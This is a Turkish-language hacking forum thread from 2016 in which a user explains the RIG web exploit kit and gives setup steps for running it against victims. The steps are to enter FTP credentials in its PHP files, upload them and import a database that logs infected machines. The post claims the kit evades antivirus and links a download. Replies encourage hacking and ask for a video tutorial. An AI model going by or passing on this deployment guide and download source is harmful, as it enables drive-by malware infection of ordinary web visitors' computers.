1.                        

RIG exploit kit

'0day Exploitleri' forumunda exploit tarafından 21 Ocak 2016 tarihinde açılan konu

1. exploit

exploit New Member

Ödül Puanları:
    0
    Selamlar :) bu gün sizlere wep sitesi üzerinden kullanılan bir exploit kit olan RIG kiti kullanımını anlatıcam.
    Önce exploit kit nedir biraz söz edelim : gündemde olan ve kullanışlı exploitleri tek bir wep sitesinde birleştirmenize yarar javascript,swf,pdf gibi dosyalarlar karşı sisteme internet sitesi üzerinden sızmanıza olan sağlar , daha çok firewall veya internet security adıyla yayımlanan anti virüsler tarafından fark edilir fark edilme oranı düşüktür .

- Olay şöyle size verdiğim dosyayı açın
    - içindeki config.php ,loader.php gibi php dosylarına bakın ve username pass gibi kısımları kendi hosting sunucunuzun ftp bilgileriyle doldurun
    - şimdi o dosyaları kendi ftp sunucumuza upload edin, .sql dosya uzantılı bir dosya var onu php admin panelinden upload edin o sizin sql veritabanınız olucak gelen bilgiler o dosya sayesinde loglanır
    - size şöyle bir login paneli gelir bilgilerinizi girin

- Şimdi ana ekrana ulaştınız buradan istediğiniz exploiti kullanın ve karşı pc yi hackleyin

Not: Exploit kit ile hack işlemlerini yapmadan önce biraz araştırma yapın ileri düzey bir yöntemdir.

İndirme linki:
    https://mega.nz/#F!qx832TxA!aIKI6IYtEI2enMovlVQ4IA

2. KaliBot

KaliBot Albay

Ödül Puanları:
    2
    Web Sitesi:
    Exploit kiti bilin istediğinizi hackleyin :)

3. ghostman

ghostman New Member

Ödül Puanları:
    0
    Güzel bi toola benziyo ama bi vieo olsaydı güzel olurdu çünküü bununla ilgili hiç kaynak yok en azından kurulumuyla ilgili ben görsel bişey bulamadım

4. ZerOne

ZerOne New Member

Ödül Puanları:
    0
    Bu tool ile ilgili bir video veya görsel bir çalışma yapılırsa çok iyi olur merak ettim açıkçası ?

Bu Sayfayı Paylaş

Share